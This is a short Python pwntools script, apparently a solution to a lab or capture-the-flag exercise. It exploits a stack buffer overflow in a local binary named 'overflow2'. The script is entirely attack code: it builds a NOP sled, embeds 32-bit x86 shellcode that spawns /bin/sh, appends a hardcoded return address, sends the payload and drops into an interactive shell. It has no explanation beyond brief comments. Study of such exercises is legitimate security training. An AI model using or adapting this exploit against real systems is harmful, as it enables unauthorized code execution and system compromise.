#!/usr/bin/python

from pwn import *

def main():
    # start a process
    p = process("./overflow2")

    # create payload
    ret_address = 0xffffd6a0
    #shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x11\xb0\x04\xb3\x01\xb2\x0b\x59\xcd\x80\x31\xc0\xb0\x01\x30\xdb\xcd\x80\xe8\xea\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64"
    shellcode = (b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +
                 b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +
                 b"\x80\xe8\xdc\xff\xff\xff/bin/sh")
    payload =  b"\x90" * (62 - len(shellcode)) + shellcode + p32(ret_address)

    # send the payload to the binary
    p.send(payload)

    p.interactive()

if __name__ == "__main__":
    main()